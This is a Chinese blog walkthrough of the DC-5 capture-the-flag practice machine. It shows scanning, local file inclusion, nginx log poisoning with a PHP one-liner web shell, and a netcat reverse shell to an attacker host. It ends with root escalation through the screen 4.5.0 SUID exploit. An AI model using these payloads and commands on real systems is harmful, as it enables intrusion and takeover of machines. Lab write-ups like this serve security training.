DC-5靶机
仅供个人娱乐
靶机信息
下载地址:http://www.five86.com/downloads/DC-5.zip
一、主机扫描
arp-scan -l
nmap -p 1-65535 -A -sV 192.168.17.131
二、信息收集
dirb http://192.168.17.131 /usr/share/wordlists/dirb/big.txt
用kali自带工具wfuzz(自带字典)扫描文件
cd /usr/share/wordlists/wfuzz/general
wfuzz -w /usr/share/wordlists/wfuzz/general/test.txt http://192.168.17.131/FUZZ.php
三、漏洞利用
利用文件包含
远程文件包含
日志
http://192.168.25.135/thankyou.php?file=/var/log/nginx/access.log
http://192.168.17.131/thankyou.php?file=/var/log/nginx/error.log
重置靶机 ip 换为http://192.168.17.132
写入一句话
GET <?php system($_GET['cmd']); ?> HTTP/1.1
http://192.168.17.132/thankyou.php?file=/var/log/nginx/access.log&cmd=nc -e /bin/bash 192.168.17.129 8888
root@kali:~/桌面# nc -lvvp 8888
或者使用
GET /thankyou.php?file=<?php @eval($_REQUEST[cmd]);?> HTTP/1.1
python -c 'import pty;pty.spawn("/bin/bash")'
查找www-data用户具有suid权限的命令
find / -perm -4000 2>/dev/null
发现命令 /bin/screen-4.5.0
根据内容进行编译 直接上传出现问题,在kali编译在蚁剑上传
root@kali:/tmp# vi libhax.c
root@kali:/tmp# gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
root@kali:/tmp# rm -f /tmp/libhax.c
root@kali:/tmp# vi rootshell.c
root@kali:/tmp# gcc -o /tmp/rootshell /tmp/rootshell.c
root@kali:/tmp# rm -f /tmp/rootshell.c
蚁剑上传
或者使用
scp root@192.168.17.129:/tmp/libhax.so /tmp/
scp root@192.168.17.129:/tmp/rootshell /tmp/
继续按照脚本
将41154.sh中剩下部分代码另存为dc5.sh脚本文件
并在保存dc5.sh文件输入:set ff=unix ,否则在执行脚本文件时后出错
www-data@dc-5:/tmp$ chmod+x toroot.sh
www-data@dc-5:/tmp$./toroot.sh
最新文章
- Oracle基础维护02-表、主键、索引、表结构维护手册
- Scalaz(58)- scalaz-stream: fs2-并行运算示范,fs2 parallel processing
- 93、持续集成以及Jenkins的知识介绍
- K-Means 聚类算法原理分析与代码实现
- HP_UX HBA 卡信息收集脚本
- 解压缩c#
- [原]openstack-kilo--issue(七):虚拟机怎么通外网,外网怎么ping通虚拟机
- 按下enter键后表单自动提交问题
- Java眼中的XML--文件读取--2 应用SAX方式解析XML
- UIkit框架之Uivew
- API 版本控制
- xml文件的解析
- 了解神奇的this
- linux c 得到文件大小
- CI分页器pagination的原理及实现
- python实现k-近邻算法
- 安装redis报错 you need tcl 8.5 or newer in order to run redis test
- Vue遇到的问题
- MySQL 字符集utf8和utf-8的关系
- renren_fast性能测试平台的安装部署